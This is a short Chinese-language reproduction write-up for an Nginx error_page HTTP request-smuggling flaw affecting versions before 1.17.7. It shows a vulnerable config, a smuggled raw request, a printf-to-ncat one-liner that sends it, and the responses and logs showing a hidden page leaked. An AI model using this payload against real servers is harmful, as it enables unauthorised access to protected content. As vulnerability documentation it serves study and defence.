一、漏洞簡介
Nginx 1.17.7之前版本中 error_page 存在安全漏洞。攻擊者可利用該漏洞讀取未授權的Web頁面。
二、漏洞影響
Ngnix < 1.17.7
三、復現過程
錯誤代碼
server { listen 80; server_name localhost; error_page 401 http://example.org; location / { return 401; } } server { listen 80; server_name notlocalhost; location /_hidden/index.html { return 200 'This should be hidden!'; } }
這時候我們可以向服務器發送以下請求
GET /a HTTP/1.1 Host: localhost Content-Length: 56 GET /_hidden/index.html HTTP/1.1 Host: notlocalhost
我們看一下服務器是怎么處理的
printf "GET /a HTTP/1.1\r\nHost: localhost\r\nContent-Length: 56\r\n\r\nGET /_hidden/index.html HTTP/1.1\r\nHost: notlocalhost\r\n\r\n" | ncat localhost 80 --noshutdown
等於說是吧兩個請求都間接的執行了,我們看一下burp里面的返回值
HTTP/1.1 302 Moved Temporarily Server: nginx/1.17.6 Date: Fri, 06 Dec 2019 18:23:33 GMT Content-Type: text/html Content-Length: 145 Connection: keep-alive Location: http://example.org <html> <head><title>302 Found</title></head> <body> <center><h1>302 Found</h1></center> <hr><center>nginx/1.17.6</center> </body> </html> HTTP/1.1 200 OK Server: nginx/1.17.6 Date: Fri, 06 Dec 2019 18:23:33 GMT Content-Type: text/html Content-Length: 22 Connection: keep-alive This should be hidden!
再一下nginx服務器里面的日志
172.17.0.1 - - [06/Dec/2019:18:23:33 +0000] "GET /a HTTP/1.1" 302 145 "-" "-" "-" 172.17.0.1 - - [06/Dec/2019:18:23:33 +0000] "GET /_hidden/index.html HTTP/1.1" 200 22 "-"